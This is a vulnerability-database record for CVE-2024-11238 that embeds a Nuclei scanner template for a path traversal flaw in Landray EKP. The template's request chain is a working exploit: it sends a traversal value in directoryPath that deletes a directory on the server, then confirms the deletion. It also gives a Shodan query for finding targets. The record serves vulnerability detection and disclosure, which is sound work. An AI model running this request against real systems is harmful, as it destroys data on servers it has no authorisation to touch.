{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-11238/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-11238/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-11238/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-11238/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-11238/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-11238"},"sightings":{"href":"/api/v1/sightings/cve-2024-11238"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-11238.yaml","nuclei_template_severity":"medium","nuclei_template_yaml":"id: CVE-2024-11238\n\ninfo:\n  name: Landray EKP - Path Traversal\n  author: theamanrawat\n  severity: medium\n  description: |\n    A vulnerability, which was classified as critical, was found in Landray EKP up to 16.0. This affects the function delPreviewFile of the file /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile. The manipulation of the argument directoryPath leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n  impact: |\n    Remote attackers can access arbitrary files on the server, potentially leading to information disclosure or system compromise.\n  remediation: |\n    Update to the latest version that addresses this vulnerability or apply appropriate patches.\n  reference:\n    - https://github.com/CoinIsMoney/TempGuide/blob/main/LL-exp-02.pdf\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-11238\n    - https://vuldb.com/?ctiid.284673\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n    cvss-score: 6.5\n    cve-id: CVE-2024-11238\n    cwe-id: CWE-22\n    epss-score: 0.05747\n    epss-percentile: 0.9278\n    cpe: cpe:2.3:a:landray:landray_ekp:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    vendor: landray\n    product: landray_ekp\n    shodan-query: http.favicon.hash:831854882\n  tags: cve,cve2024,lfi,intrusive,vkev,vuln\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        GET /login.jsp HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: faviconPath\n        internal: true\n        group: 1\n        regex:\n          - 'href=\"/resource/(.*?)/favicon.ico\"'\n\n  - raw:\n      - |\n        GET /resource/{{faviconPath}}/favicon.ico HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n        internal: true\n\n  - raw:\n      - |\n        GET /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile&directoryPath=../{{faviconPath}}/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - content_length == 0\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /resource/{{faviconPath}}/favicon.ico HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 404\n# digest: 4a0a004730450220097ea90da75af9c5eb86e195385277b2f9783b4c9e310fbfca4e97cf55231903022100ba06a9d0fcf0994512c3093ba8bcb3f818d685e8112bab2f6b77e3468710fb9b:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2024-11238"}